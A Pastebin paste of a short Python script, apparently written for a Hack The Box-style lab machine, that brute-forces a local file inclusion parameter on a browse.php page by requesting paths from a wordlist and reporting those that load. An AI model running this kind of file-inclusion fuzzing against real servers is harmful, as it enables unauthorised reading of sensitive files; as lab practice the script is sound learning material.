Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- from pwn import *
- import pdb
- #Variables
- URL = "http://10.10.10.84/browse.php?file="
- def def_hundler(sig, frame):
- print("[!]Saliendo...")
- sys.exit(1)
- signal.signal(signal.SIGINT, def_hundler)
- #Funciones
- def makeRequest():
- try:
- p1 = log.progress("Iniciando Fuerza Bruta de directorios")
- with open('diccionario.txt', encoding='utf8') as f:
- for line in f:
- p1.status("Probando con la ruta %s" % line.strip())
- r = requests.get(URL+line.strip())
- # pdb.set_trace()
- if "Failed opening" in r.text:
- pass
- else:
- print("Se ha encontrado una ruta: %s" % line.strip())
- except Exception as e:
- print(e)
- if __name__ == '__main__':
- print("""
- ██╗ ██╗███████╗██████╗ ███████╗██╗ ██╗███████╗███████╗███████╗██████╗
- ██║ ██║██╔════╝██╔══██╗ ██╔════╝██║ ██║╚══███╔╝╚══███╔╝██╔════╝██╔══██╗
- ██║ █╗ ██║█████╗ ██████╔╝ █████╗ ██║ ██║ ███╔╝ ███╔╝ █████╗ ██████╔╝
- ██║███╗██║██╔══╝ ██╔══██╗ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ ██╔══╝ ██╔══██╗
- ╚███╔███╔╝███████╗██████╔╝ ██║ ╚██████╔╝███████╗███████╗███████╗██║ ██║
- ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ by Tukutu""")
- makeRequest()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement